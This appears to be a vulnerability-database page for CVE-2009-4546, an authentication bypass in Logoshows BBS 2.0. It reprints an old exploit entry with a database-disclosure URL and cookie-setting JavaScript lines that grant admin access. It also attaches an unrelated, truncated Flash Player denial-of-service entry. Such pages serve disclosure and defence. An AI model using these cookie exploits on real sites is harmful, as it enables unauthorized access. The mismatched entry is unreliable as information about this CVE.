CVE-2009-4546
published 2010-01-04CVE-2009-4546: globepersonnel_login.asp in Logoshows BBS 2.0 allows remote attackers to bypass authentication and gain administrative access by setting the (1) pb_username…
PriorityP352high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.63%
83.6th percentile
globepersonnel_login.asp in Logoshows BBS 2.0 allows remote attackers to bypass authentication and gain administrative access by setting the (1) pb_username (aka pb%5Fusername) and (2) level cookies.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| logoshows | logoshows_bbs | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling
exploitdb·2009-08-07
CVE-2009-4546 logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling
logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling
---
Logoshows BBS 2.0 DD
ZoRLu
yildirimordulari.com - z0rlu.blogspot.com - turkguvenligi.info
ref: http://www.milw0rm.com/exploits/9389
vuln:
http://www.logoshows.com/bbs/database/globepersonnel.mdb
Logoshows BBS 2.0 ICH
yildirimordulari.com - z0rlu.blogspot.com - turkguvenligi.info
ref: http://www.milw0rm.com/exploits/9389
demo:
http://www.logoshows.com/bbs/globepersonnel_login.asp
exploit:
javascript:document.cookie = "pb%5Fusername=admin; path=/";
exploit:
javascript:document.cookie = "level=3; path=/";
after you go here:
after go here:
http://www.logoshows.com/bbs/globepersonnel_reply.asp?id=6&topic=6&recordnum=0
thanks: str0ke and all friends
# milw0rm.com [2009-08-07]
Exploit-DB
Adobe Flash Player 9/10 - SWF Version Null Pointer Dereference Denial of Service
exploitdb·2008-10-02
CVE-2008-4546 Adobe Flash Player 9/10 - SWF Version Null Pointer Dereference Denial of Service
Adobe Flash Player 9/10 - SWF Version Null Pointer Dereference Denial of Service
---
source: https://www.securityfocus.com/bid/31537/info
Adobe Flash Player Plugin is prone to a remote denial-of-service vulnerability.
Successfully exploiting this issue will allow attackers to crash the browser that uses the plugin, denying service to legitimate users.
The following versions of Flash Player Plugin are vulnerable:
9.0.45.0
9.0.112.0
9.0.124.0
10.0.12.10
UPDATE (March 11, 2009): Flash Player Plugin 10.0.22.87 is vulnerable.
UPDATE (September 4, 2009): Mac OS X 10.6 reportedly ships with Flash Player 10.0.23.1, which will overwrite any installed version of Flash Player when Mac OS X is being installed.
UPDATE (June 10, 2010): Flash Player 10.1.53.64 and 9.0.227.0 are available.
https
No writeups or analysis indexed.
2010-01-04
Published